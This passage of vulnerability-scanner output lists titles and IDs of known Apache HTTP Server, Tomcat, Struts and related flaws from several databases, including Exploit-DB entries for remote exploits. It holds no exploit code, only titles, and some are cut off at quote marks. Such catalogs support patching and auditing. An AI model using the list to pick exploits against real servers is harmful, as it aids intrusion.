| [50964] Apache APR-util apr_strmatch_precompile() denial of service
| [50930] Apache Tomcat j_security_check information disclosure
| [50928] Apache Tomcat AJP denial of service
| [50884] Apache HTTP Server XML ENTITY denial of service
| [50808] Apache HTTP Server AllowOverride privilege escalation
| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
| [50059] Apache mod_proxy_ajp information disclosure
| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
| [49921] Apache ActiveMQ Web interface cross-site scripting
| [49898] Apache Geronimo Services/Repository directory traversal
| [49725] Apache Tomcat mod_jk module information disclosure
| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
| [49712] Apache Struts unspecified cross-site scripting
| [49213] Apache Tomcat cal2.jsp cross-site scripting
| [48934] Apache Tomcat POST doRead method information disclosure
| [48211] Apache Tomcat header HTTP request smuggling
| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
| [47709] Apache Roller "
| [47104] Novell Netware ApacheAdmin console security bypass
| [47086] Apache HTTP Server OS fingerprinting unspecified
| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
| [45791] Apache Tomcat RemoteFilterValve security bypass
| [44435] Oracle WebLogic Apache Connector buffer overflow
| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
| [44156] Apache Tomcat RequestDispatcher directory traversal
| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
| [43885] Oracle WebLogic Server Apache Connector buffer overflow
| [42987] Apache HTTP Server mod_proxy module denial of service
| [42915] Apache Tomcat JSP files path disclosure
| [42914] Apache Tomcat MS-DOS path disclosure
| [42892] Apache Tomcat unspecified unauthorized access
| [42816] Apache Tomcat Host Manager cross-site scripting
| [42303] Apache 403 error cross-site scripting
| [41618] Apache-SSL ExpandCert() authentication bypass
| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
| [40614] Apache mod_jk2 HTTP Host header buffer overflow
| [40562] Apache Geronimo init information disclosure
| [40478] Novell Web Manager webadmin-apache.conf security bypass
| [40411] Apache Tomcat exception handling information disclosure
| [40409] Apache Tomcat native (APR based) connector weak security
| [40403] Apache Tomcat quotes and %5C cookie information disclosure
| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
| [39867] Apache HTTP Server mod_negotiation cross-site scripting
| [39804] Apache Tomcat SingleSignOn information disclosure
| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
| [39608] Apache HTTP Server balancer manager cross-site request forgery
| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
| [39472] Apache HTTP Server mod_status cross-site scripting
| [39201] Apache Tomcat JULI logging weak security
| [39158] Apache HTTP Server Windows SMB shares information disclosure
| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
| [38951] Apache::AuthCAS Perl module cookie SQL injection
| [38800] Apache HTTP Server 413 error page cross-site scripting
| [38211] Apache Geronimo SQLLoginModule authentication bypass
| [37243] Apache Tomcat WebDAV directory traversal
| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
| [36782] Apache Geronimo MEJB unauthorized access
| [36586] Apache HTTP Server UTF-7 cross-site scripting
| [36468] Apache Geronimo LoginModule security bypass
| [36467] Apache Tomcat functions.jsp cross-site scripting
| [36402] Apache Tomcat calendar cross-site request forgery
| [36354] Apache HTTP Server mod_proxy module denial of service
| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
| [36336] Apache Derby lock table privilege escalation
| [36335] Apache Derby schema privilege escalation
| [36006] Apache Tomcat "
| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
| [35999] Apache Tomcat \"
| [35795] Apache Tomcat CookieExample cross-site scripting
| [35536] Apache Tomcat SendMailServlet example cross-site scripting
4923| [35384] Apache HTTP Server mod_cache module denial of service
4924| [35097] Apache HTTP Server mod_status module cross-site scripting
4925| [35095] Apache HTTP Server Prefork MPM module denial of service
4926| [34984] Apache HTTP Server recall_headers information disclosure
4927| [34966] Apache HTTP Server MPM content spoofing
4928| [34965] Apache HTTP Server MPM information disclosure
4929| [34963] Apache HTTP Server MPM multiple denial of service
4930| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
4931| [34869] Apache Tomcat JSP example Web application cross-site scripting
4932| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
4933| [34496] Apache Tomcat JK Connector security bypass
4934| [34377] Apache Tomcat hello.jsp cross-site scripting
4935| [34212] Apache Tomcat SSL configuration security bypass
4936| [34210] Apache Tomcat Accept-Language cross-site scripting
4937| [34209] Apache Tomcat calendar application cross-site scripting
4938| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
4939| [34167] Apache Axis WSDL file path disclosure
4940| [34068] Apache Tomcat AJP connector information disclosure
4941| [33584] Apache HTTP Server suEXEC privilege escalation
4942| [32988] Apache Tomcat proxy module directory traversal
4943| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
4944| [32708] Debian Apache tty privilege escalation
4945| [32441] ApacheStats extract() PHP call unspecified
4946| [32128] Apache Tomcat default account
4947| [31680] Apache Tomcat RequestParamExample cross-site scripting
4948| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
4949| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
4950| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
4951| [30456] Apache mod_auth_kerb off-by-one buffer overflow
4952| [29550] Apache mod_tcl set_var() format string
4953| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
4954| [28357] Apache HTTP Server mod_alias script source information disclosure
4955| [28063] Apache mod_rewrite off-by-one buffer overflow
4956| [27902] Apache Tomcat URL information disclosure
4957| [26786] Apache James SMTP server denial of service
4958| [25680] libapache2 /tmp/svn file upload
4959| [25614] Apache Struts lookupMap cross-site scripting
4960| [25613] Apache Struts ActionForm denial of service
4961| [25612] Apache Struts isCancelled() security bypass
4962| [24965] Apache mod_python FileSession command execution
4963| [24716] Apache James spooler memory leak denial of service
4964| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
4965| [24158] Apache Geronimo jsp-examples cross-site scripting
4966| [24030] Apache auth_ldap module multiple format strings
4967| [24008] Apache mod_ssl custom error message denial of service
4968| [24003] Apache mod_auth_pgsql module multiple syslog format strings
4969| [23612] Apache mod_imap referer field cross-site scripting
4970| [23173] Apache Struts error message cross-site scripting
4971| [22942] Apache Tomcat directory listing denial of service
4972| [22858] Apache Multi-Processing Module code allows denial of service
4973| [22602] RHSA-2005:582 updates for Apache httpd not installed
4974| [22520] Apache mod-auth-shadow "
4975| [22466] ApacheTop symlink
4976| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
4977| [22006] Apache HTTP Server byte-range filter denial of service
4978| [21567] Apache mod_ssl off-by-one buffer overflow
4979| [21195] Apache HTTP Server header HTTP request smuggling
4980| [20383] Apache HTTP Server htdigest buffer overflow
4981| [19681] Apache Tomcat AJP12 request denial of service
4982| [18993] Apache HTTP server check_forensic symlink attack
4983| [18790] Apache Tomcat Manager cross-site scripting
4984| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
4985| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
4986| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
4987| [17961] Apache Web server ServerTokens has not been set
4988| [17930] Apache HTTP Server HTTP GET request denial of service
4989| [17785] Apache mod_include module buffer overflow
4990| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
4991| [17473] Apache HTTP Server Satisfy directive allows access to resources
4992| [17413] Apache htpasswd buffer overflow
4993| [17384] Apache HTTP Server environment variable configuration file buffer overflow
4994| [17382] Apache HTTP Server IPv6 apr_util denial of service
4995| [17366] Apache HTTP Server mod_dav module LOCK denial of service
4996| [17273] Apache HTTP Server speculative mode denial of service
4997| [17200] Apache HTTP Server mod_ssl denial of service
4998| [16890] Apache HTTP Server server-info request has been detected
4999| [16889] Apache HTTP Server server-status request has been detected
5000| [16705] Apache mod_ssl format string attack
5001| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
5002| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
5003| [16230] Apache HTTP Server PHP denial of service
5004| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
5005| [15958] Apache HTTP Server authentication modules memory corruption
5006| [15547] Apache HTTP Server mod_disk_cache local information disclosure
5007| [15540] Apache HTTP Server socket starvation denial of service
5008| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
5009| [15422] Apache HTTP Server mod_access information disclosure
5010| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
5011| [15293] Apache for Cygwin "
5012| [15065] Apache-SSL has a default password
5013| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
5014| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
5015| [14751] Apache Mod_python output filter information disclosure
5016| [14125] Apache HTTP Server mod_userdir module information disclosure
5017| [14075] Apache HTTP Server mod_php file descriptor leak
5018| [13703] Apache HTTP Server account
5019| [13689] Apache HTTP Server configuration allows symlinks
5020| [13688] Apache HTTP Server configuration allows SSI
5021| [13687] Apache HTTP Server Server: header value
5022| [13685] Apache HTTP Server ServerTokens value
5023| [13684] Apache HTTP Server ServerSignature value
5024| [13672] Apache HTTP Server config allows directory autoindexing
5025| [13671] Apache HTTP Server default content
5026| [13670] Apache HTTP Server config file directive references outside content root
5027| [13668] Apache HTTP Server httpd not running in chroot environment
5028| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
5029| [13664] Apache HTTP Server config file contains ScriptAlias entry
5030| [13663] Apache HTTP Server CGI support modules loaded
5031| [13661] Apache HTTP Server config file contains AddHandler entry
5032| [13660] Apache HTTP Server 500 error page not CGI script
5033| [13659] Apache HTTP Server 413 error page not CGI script
5034| [13658] Apache HTTP Server 403 error page not CGI script
5035| [13657] Apache HTTP Server 401 error page not CGI script
5036| [13552] Apache HTTP Server mod_cgid module information disclosure
5037| [13550] Apache GET request directory traversal
5038| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
5039| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
5040| [13429] Apache Tomcat non-HTTP request denial of service
5041| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
5042| [13295] Apache weak password encryption
5043| [13254] Apache Tomcat .jsp cross-site scripting
5044| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
5045| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
5046| [12681] Apache HTTP Server mod_proxy could allow mail relaying
5047| [12662] Apache HTTP Server rotatelogs denial of service
5048| [12554] Apache Tomcat stores password in plain text
5049| [12553] Apache HTTP Server redirects and subrequests denial of service
5050| [12552] Apache HTTP Server FTP proxy server denial of service
5051| [12551] Apache HTTP Server prefork MPM denial of service
5052| [12550] Apache HTTP Server weaker than expected encryption
5053| [12549] Apache HTTP Server type-map file denial of service
5054| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
5055| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
5056| [12091] Apache HTTP Server apr_password_validate denial of service
5057| [12090] Apache HTTP Server apr_psprintf code execution
5058| [11804] Apache HTTP Server mod_access_referer denial of service
5059| [11750] Apache HTTP Server could leak sensitive file descriptors
5060| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
5061| [11703] Apache long slash path allows directory listing
5062| [11695] Apache HTTP Server LF (Line Feed) denial of service
5063| [11694] Apache HTTP Server filestat.c denial of service
5064| [11438] Apache HTTP Server MIME message boundaries information disclosure
5065| [11412] Apache HTTP Server error log terminal escape sequence injection
5066| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
5067| [11195] Apache Tomcat web.xml could be used to read files
5068| [11194] Apache Tomcat URL appended with a null character could list directories
5069| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
5070| [11126] Apache HTTP Server illegal character file disclosure
5071| [11125] Apache HTTP Server DOS device name HTTP POST code execution
5072| [11124] Apache HTTP Server DOS device name denial of service
5073| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
5074| [10938] Apache HTTP Server printenv test CGI cross-site scripting
5075| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
5076| [10575] Apache mod_php module could allow an attacker to take over the httpd process
5077| [10499] Apache HTTP Server WebDAV HTTP POST view source
5078| [10457] Apache HTTP Server mod_ssl "
5079| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
5080| [10414] Apache HTTP Server htdigest multiple buffer overflows
5081| [10413] Apache HTTP Server htdigest temporary file race condition
5082| [10412] Apache HTTP Server htpasswd temporary file race condition
5083| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
5084| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
5085| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
5086| [10280] Apache HTTP Server shared memory scorecard overwrite
5087| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
5088| [10241] Apache HTTP Server Host: header cross-site scripting
5089| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
5090| [10208] Apache HTTP Server mod_dav denial of service
5091| [10206] HP VVOS Apache mod_ssl denial of service
5092| [10200] Apache HTTP Server stderr denial of service
5093| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
5094| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
5095| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
5096| [10098] Slapper worm targets OpenSSL/Apache systems
5097| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
5098| [9875] Apache HTTP Server .var file request could disclose installation path
5099| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
5100| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
5101| [9623] Apache HTTP Server ap_log_rerror() path disclosure
5102| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
5103| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
5104| [9396] Apache Tomcat null character to threads denial of service
5105| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
5106| [9249] Apache HTTP Server chunked encoding heap buffer overflow
5107| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
5108| [8932] Apache Tomcat example class information disclosure
5109| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
5110| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
5111| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
5112| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
5113| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
5114| [8400] Apache HTTP Server mod_frontpage buffer overflows
5115| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
5116| [8308] Apache "
5117| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
5118| [8119] Apache and PHP OPTIONS request reveals "
5119| [8054] Apache is running on the system
5120| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
5121| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
5122| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
5123| [7836] Apache HTTP Server log directory denial of service
5124| [7815] Apache for Windows "
5125| [7810] Apache HTTP request could result in unexpected behavior
5126| [7599] Apache Tomcat reveals installation path
5127| [7494] Apache "
5128| [7419] Apache Web Server could allow remote attackers to overwrite .log files
5129| [7363] Apache Web Server hidden HTTP requests
5130| [7249] Apache mod_proxy denial of service
5131| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
5132| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
5133| [7059] Apache "
5134| [7057] Apache "
5135| [7056] Apache "
5136| [7055] Apache "
5137| [7054] Apache "
5138| [6997] Apache Jakarta Tomcat error message may reveal information
5139| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
5140| [6970] Apache crafted HTTP request could reveal the internal IP address
5141| [6921] Apache long slash path allows directory listing
5142| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
5143| [6527] Apache Web Server for Windows and OS2 denial of service
5144| [6316] Apache Jakarta Tomcat may reveal JSP source code
5145| [6305] Apache Jakarta Tomcat directory traversal
5146| [5926] Linux Apache symbolic link
5147| [5659] Apache Web server discloses files when used with php script
5148| [5310] Apache mod_rewrite allows attacker to view arbitrary files
5149| [5204] Apache WebDAV directory listings
5150| [5197] Apache Web server reveals CGI script source code
5151| [5160] Apache Jakarta Tomcat default installation
5152| [5099] Trustix Secure Linux installs Apache with world writable access
5153| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
5154| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
5155| [4931] Apache source.asp example file allows users to write to files
5156| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
5157| [4205] Apache Jakarta Tomcat delivers file contents
5158| [2084] Apache on Debian by default serves the /usr/doc directory
5159| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
5160| [697] Apache HTTP server beck exploit
5161| [331] Apache cookies buffer overflow
|
| Exploit-DB - https://www.exploit-db.com:
| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
| [29859] Apache Roller OGNL Injection
| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
| [29290] Apache / PHP 5.x Remote Code Execution Exploit
| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
| [27096] Apache Geronimo 1.0 Error Page XSS
| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
| [25986] Plesk Apache Zeroday Remote Exploit
| [25980] Apache Struts includeParams Remote Code Execution
| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
| [24874] Apache Struts ParametersInterceptor Remote Code Execution
| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
| [21719] Apache 2.0 Path Disclosure Vulnerability
| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
| [20558] Apache 1.2 Web Server DoS Vulnerability
| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
| [19231] PHP apache_request_headers Function Buffer Overflow
| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
| [18442] Apache httpOnly Cookie Disclosure
| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
| [18221] Apache HTTP Server Denial of Service
| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
| [17691] Apache Struts < 2.2.0 - Remote Command Execution
| [16798] Apache mod_jk 1.2.20 Buffer Overflow
| [16782] Apache Win32 Chunked Encoding
| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
| [15319] Apache 2.2 (Windows) Local Denial of Service
| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
| [12330] Apache OFBiz - Multiple XSS
| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
| [466] htpasswd Apache 1.3.31 - Local Exploit
| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
| [9] Apache HTTP Server 2.x Memory Leak Exploit
|
| OpenVAS (Nessus) - http://www.openvas.org:
| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
